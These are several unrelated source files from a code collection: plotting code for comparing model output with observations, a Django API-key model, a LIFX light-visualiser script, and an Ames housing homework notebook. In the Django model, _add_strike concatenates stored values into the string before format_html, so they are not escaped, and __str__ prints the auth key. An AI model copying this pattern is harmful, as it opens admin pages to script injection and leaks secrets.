def plot_basic_time_series_for_each_site(self, hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod):
[h_obs, h_t_obs, h_unit_obs] = hour_obs
[h_mod, h_t_mod, h_unit_mod] = hour_mod
[m_obs, m_t_obs, m_unit_obs] = month_obs
[m_mod, m_t_mod, m_unit_mod] = month_mod
[d_obs, d_t_obs, d_unit_obs] = day_obs
[d_mod, d_t_mod, d_unit_mod] = day_mod
[y_obs, y_t_obs, y_unit_obs] = year_obs
[y_mod, y_t_mod, y_unit_mod] = year_mod
scores = []
for j, site in enumerate(self.sitename):
# if j==2: break
# fig0, ax0 = plt.subplots(nrows=4, ncols=2)
fig0 = plt.figure(figsize=(14, 18))
print('Process on time_basic_' + ''.join(site) + '_No.' + str(j) + '!')
obs = [h_obs, d_obs, m_obs, y_obs, h_t_obs, d_t_obs, m_t_obs, y_t_obs]
mod = [h_mod, d_mod, m_mod, y_mod, h_t_mod, d_t_mod, m_t_mod, y_t_mod]
# fig0, ax0, ax1, ax2, ax3, samples = plot_categories(fig0, obs, mod, j)
fig0, ax0, ax1, ax2, ax3, samples = plot_new_categories(fig0, obs, mod, j, 411, 412, 425, 427, 224, 5)
model_score = time_basic_score(samples)
scores.append(model_score)
# plt.suptitle(self.variable + '( ' + h_unit_obs + ' )', fontsize=20)
ax0.set_xlabel('Time',fontsize=fontsize)
ax0.set_ylabel(self.variable + '( ' + h_unit_obs + ' )', fontsize=fontsize)
ax1.set_xlabel('Time',fontsize=fontsize)
ax1.set_ylabel(self.variable + '( ' + d_unit_obs + ' )', fontsize=fontsize)
ax2.set_xlabel('Time',fontsize=fontsize)
ax2.set_ylabel(self.variable + '( ' + m_unit_obs + ' )', fontsize=fontsize)
ax3.set_xlabel('Time',fontsize=fontsize)
ax3.set_ylabel(self.variable + '( ' + y_unit_obs + ' )', fontsize=fontsize)
ax0.legend(loc='upper right', shadow=False, fontsize='medium')
# ax1.legend(loc='upper right', shadow=False, fontsize='medium')
# ax2.legend(loc='upper right', shadow=False, fontsize='medium')
# ax3.legend(loc='upper right', shadow=False, fontsize='medium')
# plt.tight_layout()
# plt.show()
fig0.savefig(self.filedir + self.variable + '/' + ''.join(site)+'_' + 'time_basic' +'_' + self.variable + '.png')
plt.close('all')
# print(model_score)
# print(scores)
# assert False
scores = np.asarray(scores)
return scores
def plot_pdf(self, hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod):
[h_obs, h_t_obs, h_unit_obs] = hour_obs
[h_mod, h_t_mod, h_unit_mod] = hour_mod
[m_obs, m_t_obs, m_unit_obs] = month_obs
[m_mod, m_t_mod, m_unit_mod] = month_mod
[d_obs, d_t_obs, d_unit_obs] = day_obs
[d_mod, d_t_mod, d_unit_mod] = day_mod
[y_obs, y_t_obs, y_unit_obs] = year_obs
[y_mod, y_t_mod, y_unit_mod] = year_mod
scores = []
for j, site in enumerate(self.sitename):
print('Process on PDF_' + ''.join(site) + '_No.' + str(j) + '!')
fig1 = plt.figure(figsize=(8, 15))
h_obs_sorted = np.ma.sort(h_obs[j, :]).compressed()
d_obs_sorted = np.ma.sort(d_obs[j, :]).compressed()
m_obs_sorted = np.ma.sort(m_obs[j, :]).compressed()
y_obs_sorted = np.ma.sort(y_obs[j, :]).compressed()
# print(h_obs[j,:].shape)
# print(h_obs_sorted)
p1_data = 1. * np.arange(len(h_obs_sorted)) / (len(h_obs_sorted) - 1)
p2_data = 1. * np.arange(len(d_obs_sorted)) / (len(d_obs_sorted) - 1)
p3_data = 1. * np.arange(len(m_obs_sorted)) / (len(m_obs_sorted) - 1)
p4_data = 1. * np.arange(len(y_obs_sorted)) / (len(y_obs_sorted) - 1)
ax4 = fig1.add_subplot(4, 1, 1)
ax5 = fig1.add_subplot(4, 1, 2)
ax6 = fig1.add_subplot(4, 1, 3)
ax7 = fig1.add_subplot(4, 1, 4)
ax4.plot(h_obs_sorted, p1_data, label='Observed')
ax5.plot(d_obs_sorted, p2_data, label='Observed')
ax6.plot(m_obs_sorted, p3_data, label='Observed')
ax7.plot(y_obs_sorted, p4_data, label='Observed')
for i in range(len(d_mod)):
ax4.plot(np.ma.sort((h_mod[i][j, :][~h_obs[j, :].mask])), p1_data, label="Model "+str(i+1))
ax5.plot(np.ma.sort((d_mod[i][j, :][~d_obs[j, :].mask])), p2_data, label="Model "+str(i+1))
ax6.plot(np.ma.sort((m_mod[i][j, :][~m_obs[j, :].mask])), p3_data, label="Model "+str(i+1))
ax7.plot(np.ma.sort((y_mod[i][j, :][~y_obs[j, :].mask])), p4_data, label="Model "+str(i+1))
# fig1, ax4, ax5, ax6, ax7 = plot_categories(fig1, obs, mod, j)
ax4.set_ylabel('CDF',fontsize=12)
ax4.set_xlabel(self.variable + '( ' + h_unit_obs + ' )', fontsize=12)
ax5.set_ylabel('CDF',fontsize=12)
ax5.set_xlabel(self.variable + '( ' + d_unit_obs + ' )', fontsize=12)
ax6.set_ylabel('CDF',fontsize=12)
ax6.set_xlabel(self.variable + '( ' + m_unit_obs + ' )', fontsize=12)
ax7.set_ylabel('CDF',fontsize=12)
ax7.set_xlabel(self.variable + '( ' + y_unit_obs + ' )', fontsize=12)
ax4.legend(loc='upper right', shadow=False, fontsize='medium')
# ax5.legend(loc='upper right', shadow=False, fontsize='medium')
# ax6.legend(loc='upper right', shadow=False, fontsize='medium')
# ax7.legend(loc='upper right', shadow=False, fontsize='medium')
fig1.savefig(self.filedir + self.variable + '/' + ''.join(site) + '_' + 'pdf' + '_' + self.variable + '.png')
plt.close('all')
scores = np.asarray(scores)
return scores
def time_analysis(variable_name, h_site_name_obs, filedir, hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod):
f1 = basic_post(variable_name, h_site_name_obs, filedir)
scores_time_series = f1.plot_basic_time_series_for_each_site(hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod)
scores_pdf = f1.plot_pdf(hour_obs, hour_mod, day_obs, day_mod, month_obs, month_mod, year_obs, year_mod)
return scores_time_series, scores_pdf |
986,918 | 72959a838c71747f6b4bc878dda1821735b5c9c4 | from django.db import models
from datetime import datetime
from django.utils import timezone
from django.utils.html import format_html
# Create your models here.
class ApiKey(models.Model):
url = models.TextField()
userId = models.CharField(max_length=255)
authKey = models.CharField(max_length=255)
startTime = models.DateTimeField()
endTime = models.DateTimeField()
lastSuccess = models.DateTimeField(null=True)
_date_format = "%d %b %Y, %H:%M:%S"
def is_valid(self):
"""Returns True if this key is valid (now is between the start and end times)"""
return self.startTime <= ApiKey.get_now() < self.endTime
def update_last_valid(self):
self.lastSuccess = ApiKey.get_now()
self.save()
@staticmethod
def get_now():
return timezone.make_aware(datetime.now(), timezone.get_current_timezone())
@staticmethod
def get_valid():
"""Get all ApiKeys that are valid."""
now = timezone.make_aware(datetime.now(), timezone.get_current_timezone())
keys = ApiKey.objects.all().filter(startTime__lte=now).filter(endTime__gt=now).order_by('-lastSuccess')
# print(keys.query)
return keys
def formatted_url(self):
if self.is_valid():
return self.url
else:
return ApiKey._add_strike(self.url)
formatted_url.short_description = "URL"
def formatted_user_id(self):
if self.is_valid():
return self.userId
else:
return ApiKey._add_strike(self.userId)
formatted_user_id.short_description = "User ID"
def formatted_auth_key(self):
if self.is_valid():
return self.authKey
else:
return ApiKey._add_strike(self.authKey)
formatted_auth_key.short_description = "Key"
def formatted_start_time(self):
if self.is_valid():
return self.startTime.strftime(ApiKey._date_format)
else:
return ApiKey._add_strike(self.startTime.strftime(ApiKey._date_format))
formatted_start_time.short_description = "Start Time"
def formatted_end_time(self):
if self.is_valid():
return self.endTime.strftime(ApiKey._date_format)
else:
return ApiKey._add_strike(self.endTime.strftime(ApiKey._date_format))
formatted_end_time.short_description = "End Time"
def formatted_last_success(self):
if self.is_valid():
if self.lastSuccess is None:
return "Never"
else:
return self.lastSuccess.strftime(ApiKey._date_format)
else:
if self.lastSuccess is None:
return ApiKey._add_strike("Never")
else:
return ApiKey._add_strike(self.lastSuccess.strftime(ApiKey._date_format))
formatted_last_success.short_description = "Last Success"
@staticmethod
def _add_strike(value):
return format_html("<span style=\"text-decoration: line-through;\">" + value + "</span>")
def __str__(self):
return '%s:%s' % (self.userId, self.authKey)
|
986,919 | 5746804655b28aa7a49aa5c73a97d58e2736679a | import matplotlib.pyplot as pl
import socket, time, sys, traceback, math, json, random, string, numpy as np
try:
import audiodev, audiospeex
except:
print 'cannot load audiodev.so and audiospeex.so, please set the PYTHONPATH'
traceback.print_exc()
sys.exit(-1)
def getTerminalSize():
import os
env = os.environ
def ioctl_GWINSZ(fd):
try:
import fcntl, termios, struct, os
cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ,
'1234'))
except:
return
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
### Use get(key[, default]) instead of a try/catch
#try:
# cr = (env['LINES'], env['COLUMNS'])
#except:
# cr = (25, 80)
return int(cr[1]), int(cr[0])
# Connect to LIFX:
lifx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
lifx.connect(('localhost', 8080))
def send(command):
lifx.send(json.dumps(command)+'\n')
last_update = 0
last_hue_change = 0
levels = [0,0,0,0]
slow_level = 1.0
fast_level = 1.0
slow_fade = 0.985
fast_fade = 0.8
variance = 0.1
hue = random.random()*360
hue_index = 1
def colorwheel(hue):
if hue < 30:
return 1 # red
elif hue < 80:
return 3 # yellow
elif hue < 150:
return 2 # green
elif hue < 200:
return 6 # cyan
elif hue < 260:
return 4 # blue
elif hue < 330:
return 5
else:
return 1
def inout(fragment, timestamp, userdata):
global f, d, slow_level, slow_fade, fast_level, fast_fade, variance, std, n, levels, last_update, last_hue_change, hue, hue_index
try:
data = np.fromstring(fragment, dtype='int16')
f = data
lev = np.std(data)
d = np.fft.rfft(data)
l = np.linalg.norm(d)
fast_level *= fast_fade
fast_level += (1.0-fast_fade)*l
slow_level *= slow_fade
slow_level += (1.0-slow_fade)*l
error2 = (fast_level - slow_level)**2
variance *= slow_fade
variance += (1-slow_fade)*error2
std = math.sqrt(variance)
# Clip to prevent instability when quiet:
std = np.max([std,8000])
level_offset = (fast_level-slow_level)/std
bigness = 0.5 + 0.5*level_offset
levels.append(bigness)
hueChange = False
if level_offset > 1.5 and time.time() - last_hue_change > 0.3 and levels[-1] > levels[-2] and levels[-2] > levels[-3]:
last_hue_change = time.time()
hue += (60+120*random.random())
hue %= 360
hueChange = True
hue_index = colorwheel(hue)
(width, height) = getTerminalSize()
width_factor = 0.1
o = int(np.clip(np.exp(level_offset*0.6-1.5)*width_factor,-0.5,0.5)*width)
if o < 0:
print '[0;3'+str(hue_index)+'m' + ' '*int(width//2+o) + u'\u2588'*(-o)*2
else:
print '[0;3'+str(hue_index)+'m' + ' '*int(width//2-o) + u'\u2588'*o*2
if time.time() - last_update > 0.25:
last_update = time.time()
avg = np.clip(np.mean(levels),0,1)
levels = levels[-2:]
if True:
send({
'operation': 'color',
'value': {
'hue': hue,
'brightness': 0.05 + 0.05 * avg*0.2,
'saturation': 0.4,
'fadeTime': 0 if hueChange else 300
}
})
#print '*'*int(bigness*10)
return np.chararray.tostring(data*0)
except KeyboardInterrupt:
pass
except:
print traceback.print_exc()
return ""
audiodev.open(output="default", input="default",
format="l16", sample_rate=44100, frame_duration=20,
output_channels=2, input_channels=1, flags=0x01, callback=inout)
try:
while True:
time.sleep(10)
except KeyboardInterrupt:
audiodev.close()
#pl.plot(levels)
#pl.show()
|
986,920 | ff026a59f63303576c52d53e5eac041795be5e05 | #!/usr/bin/env python
# coding: utf-8
# # Homework 3 - Ames Housing Dataset
# For all parts below, answer all parts as shown in the Google document for Homework 3. Be sure to include both code that justifies your answer as well as text to answer the questions. We also ask that code be commented to make it easier to follow.
# ## Part 1 - Pairwise Correlations
# I have taken the following columns for finding the Pearson Correlation Coefficient between them. All of them are numerical columns. I have also included Sale Price in the correlation analysis as I feel that would be pretty helpful to analyse the correlation of different variables with the Sale Price and those maybe the potential candidates to include in our prediction model.
#
# 1) LotFrontage
# 2) LotArea
# 3) OverallQual
# 4) OverallCond
# 5) SalePrice
# 6) GarageArea
# 7) TotRmsAbvGrd
# 8) TotalBsmtSF
# 9) YearRemodAdd
# 10) GrLivArea
# 11) YearBuilt
# 12) BedroomAbvGr
# 13) GarageYrBlt
# 14) 2ndFlrSF
# 15) LowQualFinSF
# In[534]:
#importing all the necessary libraries
import pandas as pd
from pandas import *
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
from scipy.stats.stats import pearsonr
import itertools
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.cluster import AgglomerativeClustering
from scipy.cluster.hierarchy import dendrogram, linkage
from sklearn.cluster import KMeans
from sklearn import linear_model
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.metrics import r2_score
get_ipython().system('pip install xgboost')
from xgboost import XGBRegressor
from sklearn.metrics import mean_squared_error
from sklearn.kernel_ridge import KernelRidge
from sklearn import linear_model
from sklearn import preprocessing
train_houses = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/train.csv')
train_houses.head()
# In[535]:
train_houses_correlation_columns = train_houses[['LotFrontage', 'LotArea', 'OverallQual', 'OverallCond', 'GarageArea', 'TotRmsAbvGrd','TotalBsmtSF','YearRemodAdd','GrLivArea','YearBuilt','BedroomAbvGr','GarageYrBlt','2ndFlrSF','LowQualFinSF','SalePrice']]
train_houses_not_null = train_houses_correlation_columns.dropna(axis = 0, how='any')
correlations = {}
columns = ['LotFrontage', 'LotArea', 'OverallQual', 'OverallCond', 'SalePrice', 'GarageArea', 'TotRmsAbvGrd', 'TotalBsmtSF','YearRemodAdd','GrLivArea','YearBuilt','BedroomAbvGr','GarageYrBlt','2ndFlrSF','LowQualFinSF']
for col_a, col_b in itertools.combinations(columns, 2):
correlations[col_a + '__' + col_b] = pearsonr(train_houses_not_null.loc[:, col_a], train_houses_not_null.loc[:, col_b])
correlation_result = DataFrame.from_dict(correlations, orient='index')
correlation_result.columns = ['PCC', 'p-value']
correlation_result = correlation_result[['PCC']]
correlation_result = correlation_result.sort_values(by=['PCC'], ascending=False)
with pd.option_context('display.max_rows', None, 'display.max_columns', None): print(correlation_result)
# In[540]:
a4_dims = (11.7, 8.27)
fig, ax = plt.subplots(figsize=a4_dims)
sns.heatmap(train_houses_not_null.corr(),ax=ax)
print("Heatmap for the correlation co-efficients")
# Discuss most positive and negative correlations.
#
# Most Positive Correlations:
#
#
# 1) YearBuilt__GarageYrBlt 0.824558
#
# This correlation tells us that the earlier the house was built, the earlier they built the garage.
# Most of the houses have the garage when the house was itself built. I subtracted the year the house was built from the year the garage was built. Most of the values were 0, which means that the garage was built when the house was built.
#
# One interesting thing I found out while taking the difference of the years was that some differences were negative. This means that the garage was built earlier than the house. It may possibly be a mistake or the garage was built first and then it was extended to a house!
#
# 2) OverallQual__SalePrice 0.799069
#
# Even this should not come as a surprise as this is the expected behaviour. The better the quality of the house, the higher will be its sale price. The scatter plot for this can be seen below. One interesting thing to note here is that each overall quality has some range of Sale Price. And that range keeps on increasing as we increase the overall quality. For example, 'Overall Quality' --> 2 has a range of Sale Price somewhere between 10,000 - 90,000, 'Overall Quality' --> 3 has a range of Sale Price of 50,000 t o 1,30,000. The ranges for overall quality are overlapping, but the maximum value of 'Sale Price' for each 'Overall Quality' is increasing linearly.
# In[546]:
plt.scatter(train_houses_not_null['YearBuilt'], train_houses_not_null['GarageYrBlt'])
plt.xlabel('Year Built')
plt.ylabel('Garage Year Built')
plt.show()
plt.scatter(train_houses_not_null['OverallQual'], train_houses_not_null['SalePrice'])
plt.xlabel('House Overall Quality')
plt.ylabel('House Sale Price')
plt.show()
# Most negative correlations:
#
# 1) OverallCond__YearBuilt -0.426921
#
# This correlation tells us that the earlier the house was built, the overall condition deteriorated Although, it's not a strong correlation. This can be explained by the fact the house was also remodelled. This is proven by the fact that 'YearRemodAdd' and 'OverallQual' of the house is correlated nicely at 0.57. The year in which the house was remodeled is given by the column 'YearRemodAdd'.
#
# 2) OverallCond__GarageYrBlt -0.343965
#
# This correlation tells us about the relation between the overall condition of the house and the year the garage was built in. The older the garage, the bad the condition of the house.
#
# The scatter plots for both of these negative correlations can be seen below.
# In[80]:
plt.scatter(train_houses_not_null['OverallCond'], train_houses_not_null['YearBuilt'])
plt.xlabel('Overall Condition of the house')
plt.ylabel('Year Built')
plt.show()
plt.scatter(train_houses_not_null['OverallCond'], train_houses_not_null['GarageYrBlt'])
plt.xlabel('Overall Condition of the house')
plt.ylabel('Garage Year Built')
plt.show()
# ## Part 2 - Informative Plots
# In[567]:
# code to generate Plot 1
# Scatter Plot of House Style v/s Year Built
plt.scatter(train_houses['HouseStyle'], train_houses['YearBuilt'])
plt.xlabel('House Style')
plt.ylabel('Year Built')
plt.show()
# What interesting properties does Plot 1 reveal?
#
# The most interesting properties that the Plot 1 reveal are the ranges of years for which a particular house style was in fashion in Ames, Iowa.
#
# The most popular version of the house people preferred in Ames was 2Story building.
#
# For example, the construction for 2Story house style began way back in 1800s and it was built evenly till late 2000s .
#
# There were a few instances of 1Story buildings in 1880's and then the construction of 1Story buildings stopped until 1910s
# and then again it was built regularly.
#
# The most rare house styles are 1.5Unf, 2.5Unf and 2.5Fin. They were present on on-off basis.
#
# It would be pretty interesting to know the reasons behind why such patterns are observed. Why the construction of a particular house style was relevant only for a particular period of time. It may reveal some very interesting back-stories.
#
# In[582]:
# code to generate Plot 2
# Scatter plot of Garage Quality vs Sale Price
garagequal_saleprice_notnull = train_houses[['GarageQual', 'SalePrice']].dropna(axis=0, how='any')
plt.scatter(garagequal_saleprice_notnull['GarageQual'], garagequal_saleprice_notnull['SalePrice'], color='maroon')
plt.xlabel('Garage Quality')
plt.ylabel('Sale Price')
plt.show()
# What interesting properties does Plot 2 reveal?
#
# TA - Typical
# Fa - Fair
# Gd - Good
# Ex - Excellent
# Po - Poor
# Plot 2 reveals that SalePrice is dependent on Garage Quality but not too much. We can conclude this by seeing that Poor garage quality houses have SalePrice mostly on the lower side of the spectrum. Fair, which is a grade higher than Poor, has slight higher values of SalePrice. Good garage quality has slightly higher range of values than Fair.
#
# But one interesting thing to note here is that Typical Garage quality is distributed nicely among all the SalePrices and most of the data points are in the typical garage quality bracket. This tells us that once the Garage Quality reaches a level of Typical, the customer does not focus much on it. He will look for other features. But, if the garage quality is below typical, like Poor or Fair, it may affect the price of the house severely and negatively.
#
# This tells us the subtlety or the nuance of the effect of Garage Quality on SalePrice.
# In[581]:
# code to generate Plot 3
# Scatter plot of Neighborhood v/s the year the houses were built there.
plt.scatter(train_houses['YearBuilt'], train_houses['Neighborhood'],color='saddlebrown')
plt.xlabel('Year Built')
plt.ylabel('Neighborhood')
plt.show()
# What interesting properties does Plot 3 reveal?
#
# Plot 3 reveals interesting things about the year the neighborhood was developed in the city of Ames. We can find out the recently developed neighborhoods and the neighborhoods which were developed quite early.
#
# For example, Old Town neighborhood has construction started quite early in 1800s. Blmngtn is a new neighborhood which started with first house being constructed in around 2000s.
#
# There are some areas in which the construction started and continued for a few years or decades and then stopped for decades and then restarted again.
#
# It would be interesting to know the reasons behind these gaps. And the reasons behind those gaps could lead to some interesting analysis.
# In[580]:
# code to generate Plot 4
# Bar graph of neighborhood v/s mean SalePrice
new_data = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/train.csv')
new_data.Neighborhood.head()
groupby_neighborhood = new_data[['Neighborhood', 'SalePrice']]
neighborhoods = new_data.Neighborhood.unique().tolist()
#neighborhoods_list = neighborhoods.values().tolist()
groupby_neighborhood.shape
ng = groupby_neighborhood.groupby('Neighborhood').mean()
ng = ng.sort_values(by='SalePrice')
print(ng.head())
plot1 = (ng).plot(kind='bar', color='darkorange')
fig= plt.figure(figsize=(6,3))
# What interesting properties does Plot 4 reveal?
#
# This line chart reveals the relation between the Neighborhood and the Sale Price.
# In[609]:
# code to generate Plot 5
# Line Graph of MSSubClass v/s SalePrice
MSSubClasses = train_houses.MSSubClass.unique().tolist()
MSSub = train_houses[['MSSubClass', 'SalePrice']]
mg = MSSub.groupby('MSSubClass').mean()
mg = mg.sort_values(by='SalePrice')
print(mg.head())
plot1 = (mg).plot(color='darkorange')
plt.xlabel('MSSubClass')
plt.ylabel('SalePrice')
plt.show()
# What interesting properties does Plot 5 reveal?
#
# This plot shows the average SalePrice for a group of MSSubClass.
# ## Part 3 - Handcrafted Scoring Function
# In[274]:
# TODO: code for scoring function
# Finding correlation between ordinal variables and sale price
ordinal_saleprice = train_houses[['ExterQual', 'ExterCond','BsmtQual', 'BsmtCond', 'HeatingQC', 'KitchenQual', 'FireplaceQu' , 'GarageQual',
'GarageCond', 'SalePrice']]
mapper = {'Ex':5, 'Gd':4, 'TA':3, 'Fa':2, 'Po':1}
new_ordinal_saleprice = ordinal_saleprice.replace(mapper)
new_ordinal_saleprice.fillna(0, inplace=True)
corr1 = new_ordinal_saleprice.corr()
# print(corr1)
house_score_columns = ['OverallQual', 'YearBuilt', 'TotalBsmtSF', 'GrLivArea', 'GarageArea','TotRmsAbvGrd','ExterQual','KitchenQual','SalePrice']
house_score_exterqual_ordinal = train_houses[house_score_columns].replace(mapper)
house_score_exterqual_ordinal.fillna(0, inplace=True)
house_score_exterqual_ordinal.head()
corr = house_score_exterqual_ordinal.corr()
corr_saleprice_values = corr['SalePrice'].tolist()
corr_saleprice_values.pop()
# print(corr_saleprice_values)
weights = []
sum = 0
for idx in range(len(corr_saleprice_values)):
sum+=corr_saleprice_values[idx]
for idx in range(len(corr_saleprice_values)):
weights.append(corr_saleprice_values[idx]/sum)
house_score_saleprice_dropped = house_score_exterqual_ordinal.drop(columns=['SalePrice'])
# Calculate the maximum possible score
max_score = 0
max_columns = house_score_exterqual_ordinal.max()
max_columns_list = max_columns.tolist()
# Removing the SalePrice column
max_columns_list.pop()
# Find the maximum score possible by multiplying the maximum value in each column with its weight
for index in range(len(max_columns_list)):
max_score+=max_columns_list[index]*weights[index]
column_index = 0;
scores = []
for row in house_score_saleprice_dropped.iterrows():
score = 0
for column_index in range(len(weights)):
score+=row[1][column_index]*weights[column_index]
score = (score*100)/max_score
scores.append(score)
house_score_exterqual_ordinal['score'] = scores
house_score_sorted = house_score_exterqual_ordinal.sort_values(by=['score'],ascending=False)
house_score_sorted.insert(0, 'Id', train_houses[['Id']])
display(house_score_sorted.head(10))
print("Ten most desirable houses")
Id_SalePrice_Score = house_score_sorted[['Id', 'SalePrice', 'score']]
display(Id_SalePrice_Score. head(10))
# train_houses['score'] = scores
# train_houses_sorted = train_houses.sort_values(by=['score'], ascending=False)
# Fetching the 10 most desirable houses
# train_houses_sorted.head(10)
# What is the ten most desirable houses?
#
# The IDs of the ten most desirable houses ( as can be seen in the table above with all column values ) are:
#
# Id SalePrice score
# 1299 160000 99.978223
# 524 184750 70.691236
# 1183 745000 64.011294
# 692 755000 63.264750
# 497 430000 58.221686
# 1170 625000 54.814496
# 441 555000 52.445614
# 1374 466500 52.016900
# 1354 410000 51.697533
# 799 485000 51.397749
# In[272]:
# Fetching the 10 least desirable houses
house_score_sorted_ascending = house_score_exterqual_ordinal.sort_values(by=['score'])
house_score_sorted_ascending.insert(0, 'Id', train_houses[['Id']])
display(house_score_sorted_ascending.head(10))
print("Ten least desirable houses")
# What is the ten least desirable houses?
#
# The IDs of the ten least desirable houses ( as can be seen in the table above with all column values ) are:
#
# Id SalePrice score
#
# 534 39300 12.971542
# 1101 60000 17.025584
# 1219 80500 17.241422
# 711 52000 17.557500
# 1322 72500 17.691305
# 637 60000 18.008895
# 529 86000 18.203606
# 1324 82500 18.366807
# 706 55000 18.472395
# 1036 84000 18.680118
# Describe your scoring function and how well you think it worked.
#
# The notion of desirability was attached to the sense of cost.
# So, for the scoring function, I used the correlation matrix that I prepared in question 1 and saw which correlations with 'Sale Price' were the most significant among all the variables. I selected those variables to be used in the scoring function. For negative correlations, I was not getting significant enough correlation with 'Sale Price'. The highest negative correlation was around -0.42. Hence, I decided not to use the negative correlations.
#
# The variables which were selected based on the correlation with 'Sale Price' are:
#
# Variable Correlation with SalePrice
#
# 1) OverallQual 0.790982
# 2) YearBuilt 0.522897
# 3) TotalBsmtSF 0.613581
# 4) GrLivArea 0.708624
# 5) GarageArea 0.623431
# 6) TotRmsAbvGrd 0.533723
# 7) ExterQual 0.682639
# 8) KitchenQual 0.659600
#
# The last two variables 'ExterQual' and 'KitchenQual' were ordinal variables and converted to numerical values by mapping the following:
# {'Excellent': 5, 'Good' : 4,'Typical' : 3, 'Fair':2, 'Poor':1, 'NA':0}
#
# The scoring functions calculates a weight to be given to each variable depending upon the extent of its correlation with the SalePrice. It then calculates the total score for a particular row by multiplying the weights of the column with the column value.
#
# The maximum possible score is calculated and then each score is divided by the maximum possible score and multiplied by a 100 to obtain a normalized score out of 100.
#
# If you have a look at the table for the most desirable houses, the top desirable house (ie ID: 1299 sits comfortably at the top with a normalized score of 99.97 and the second position is at 70.69
# This is because of the excellent values of the variables of that particular house. The rest of the 9 houses are the ones who have the highest SalePrice among the whole data. So, I would say that the scoring function works pretty well.
#
# If you have a look at the 10 least desirable houses, they have terrible values of the variables and these things are eventually reflected in their ultimate price. The Sale Price of the house are among the lowest in the whole dataset.
# In[278]:
# The distribution of the scoring function can be plotted as below
# Most of our houses have a score of 20-60 and there are very few houses which are above 60.
sns.distplot(house_score_sorted_ascending['score'])
# ## Part 4 - Pairwise Distance Function
# Here, we need to find homes that are similar to each other. This means that homes that are of similar make, similar exterior material, similar lot shape, building type, house style and many more properties of the house. We will ignore the attributes of the house such as quality of garage, overall quality, fireplace quality as such variables are not dependent on the neighborhood. Same quality of the houses can be found in different neighborhoods. We will only consider the variables that are related to physical properties of the house.
#
#
# For assigning distances between a pair of categorical variable values, we will first label encode the categorical variables and then one hot encode it.
# In[642]:
# code for distance function
# For each categorical column
# We fit a label encoder, transform our column and
# add it to our new dataframe
cat_columns = {'MSSubClass', 'MSZoning', 'Street', 'Condition1', 'Condition2', 'BldgType','HouseStyle','RoofStyle','RoofMatl','Exterior1st','Exterior2nd','Foundation','Heating','Electrical','GarageType'}
dist_houses = train_houses[['Id', 'Neighborhood']]
train_houses_dist = train_houses[['Id', 'Neighborhood', 'MSSubClass', 'MSZoning', 'Street', 'Condition1', 'Condition2', 'BldgType','HouseStyle','RoofStyle','RoofMatl','Exterior1st','Exterior2nd','Foundation','Heating','Electrical','GarageType']]
train_houses_dist = train_houses_dist.dropna(how='any')
display(train_houses_dist.shape)
train_houses_dist.head()
train_houses_dist_ohe = train_houses_dist[['MSSubClass', 'MSZoning', 'Street', 'Condition1', 'Condition2', 'BldgType','HouseStyle','RoofStyle','RoofMatl','Exterior1st','Exterior2nd','Foundation','Heating','Electrical','GarageType']]
distance_cols = ['LotFrontage', 'LotArea', 'YearBuilt', 'GrLivArea','GarageArea']
distance_data = train_houses[distance_cols]
distance_data.fillna(0, inplace=True)
from sklearn.metrics.pairwise import euclidean_distances
# Calculating the Euclidian distances between two rows in the data
eu_dist = euclidean_distances(distance_data, distance_data)
# getting the normalized euclidian distances
origin = [[0 for i in range(len(eu_dist[0]))] for j in range(len(eu_dist))]
eu_dist_norm = euclidean_distances(eu_dist,origin)
print(eu_dist_norm)
# In[626]:
print(eu_dist)
# How well does the distance function work? When does it do well/badly?
#
# I have calculated the Distance matrix between some of the variables. The notion of distance is attached to the neighborhood. Houses in the same neighborhood are similar and hence tend to have a less distance between them.
# ## Part 5 - Clustering
# In[647]:
#code for clustering and visualization
display(train_houses_dist_ohe.head())
ohe_dist_houses = pd.get_dummies(train_houses_dist_ohe)
ohe_dist_houses.shape
ohe_dist_houses_with_ids_neighbors = pd.concat([dist_houses, ohe_dist_houses], axis=1)
# Agglomerative clustering
cluster = AgglomerativeClustering(n_clusters=15, affinity='euclidean', linkage='ward')
display(cluster.fit_predict(distance_data))
# k means clustering
kmeans = KMeans(n_clusters=15)
kmeans.fit(eu_dist)
y_kmeans = kmeans.predict(eu_dist)
plt.scatter(eu_dist[:,0], eu_dist[:,1], c=y_kmeans, s=1000,cmap='viridis')
centers = kmeans.cluster_centers_
plt.scatter(centers[:, 0], centers[:, 1], c='black', alpha=0.5);
new_data_1 = pd.read_csv('C:/Fall2019/DSF/Assignment2/Data/train.csv')
groupby_neighborhood_1 = new_data[['Neighborhood', 'SalePrice']]
neighborhoods_1 = new_data_1.Neighborhood.unique().tolist()
ng1 = groupby_neighborhood.groupby('Neighborhood').mean()
ng1 = ng.sort_values(by='SalePrice')
plot1 = (ng1).plot(color='brown')
fig= plt.figure(figsize=(6,3))
# How well do the clusters reflect neighborhood boundaries? Write a discussion on what your clusters capture and how well they work.
#
# I have applied agglomerative and k means clustering. The boundaries were reflected more clearly in the k means clustering algorithm.
# I have taken the number of clusters to be 15 for optimal performance of k means clustering. The number of possible neighborhoods is 25. Hence, all boundaries of neighborhood may not be reflected clearly here.
#
# The plot above is highly reflective of 'Neighborhood' and the mean 'SalePrice'.
# So, the points lying around 0-50000 are the ones which have that SalePrice in that range and the cheapest neighborhood is reflected in those points.
#
# The two plots above can be compared and the points lying cloesest to the origin are the points in the neighborhood closest to the origin. And so on.
# ## Part 6 - Linear Regression
# In[472]:
# code for linear regression
# We will use those variables for predicting the sale price which have the highest correlation with the SalePrice variable.
house_score_exterqual_ordinal_neighbors['logSalePrice'] = np.log(house_score_exterqual_ordinal_neighbors['SalePrice'])
